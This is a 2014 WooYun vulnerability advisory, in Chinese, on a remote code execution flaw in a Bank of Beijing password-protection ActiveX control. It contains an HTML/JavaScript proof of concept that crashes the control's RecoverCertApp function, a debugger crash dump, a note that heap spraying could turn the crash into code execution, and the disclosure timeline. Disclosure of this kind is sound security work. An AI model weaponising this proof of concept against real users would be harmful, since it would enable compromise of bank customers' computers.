当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080417

漏洞标题:某银行密码安全软件存在远程代码执行漏洞

相关厂商:XX银行

漏洞作者: 路人甲

提交时间:2014-10-22 22:46

修复时间:2015-01-20 22:48

公开时间:2015-01-20 22:48

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-22: 细节已通知厂商并且等待厂商处理中
2014-10-27: 厂商已经确认,细节仅向厂商公开
2014-10-30: 细节向第三方安全合作伙伴开放
2014-12-21: 细节向核心白帽子及相关领域专家公开
2014-12-31: 细节向普通白帽子公开
2015-01-10: 细节向实习白帽子公开
2015-01-20: 细节向公众公开

简要描述:

某银行软件应用接口函数调用未做正确初始化,导致调用一个无效的地址,造成任意代码执行。

详细说明:

北京银行密码控件bjcaotp.exe的BjcaUserCtrl.ocx控件的RecoverCertApp函数调用时,内存为正确初始化,导致调用一个无效的地址,在网页中可以通过预先HeapSpary的技术放置恶意的攻击代码,从而可以造成任意代码的执行。
控件下载地址:https://ebank.bankofbeijing.com.cn/bccbpb/downloadBJCA/bjcaotp.exe
Poc:

<object id='ooo' classid='CLSID:{F460ADF7-2BCD-4E82-B092-E570F8644638}'></object>
<script>
a="A"
while(a.length<557)
{	a+=a
}
fake = ooo.RecoverCertApp(a)
</script>


漏洞证明:

测试环境win7+ie11
安装控件之后,构造webserver,将poc通过浏览器打开

11111.png


Crashinfo
(efc.ee4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=006f006c ebx=040c7f78 ecx=031eafe8 edx=0808fcc8 esi=00000000 edi=00000007
eip=8e000000 esp=0808fca8 ebp=0808fcd4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
8e000000 ??              ???
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\BJCAUS~1.OCX - 
0:018> kb
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
0808fca4 02b88d7c 72492e8b 031eafe8 00000000 0x8e000000
0808fcd4 766eee1c 040c7f78 0808fd20 772737eb BJCAUS_1!DllUnregisterServer+0x57c
0808fce0 772737eb 040c7f78 7ae468dd 00000000 kernel32!BaseThreadInitThunk+0xe
0808fd20 772737be 72492e1a 040c7f78 00000000 ntdll!__RtlUserThreadStart+0x70
0808fd38 00000000 72492e1a 040c7f78 00000000 ntdll!_RtlUserThreadStart+0x1b
0:018> dd eax
006f006c  69efb619 282ab981 88000000 0071c6f8
006f007c  00000000 282ab99f 88000000 00000000
006f008c  00000000 282ab99d 88000000 00000191
006f009c  00000cd4 282ab99b 88000000 00000000
006f00ac  00000000 282ab999 88001df8 00000191
006f00bc  00000cd4 282ab997 88000000 756a6f14
006f00cc  00718520 282ab995 88000000 00000000
006f00dc  00000000 282ab993 88000000 00000000


修复方案:

正确初始化

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:18

确认时间:2014-10-27 10:02

厂商回复:

最新状态:

2014-10-27:评分有误 ,应该为18分。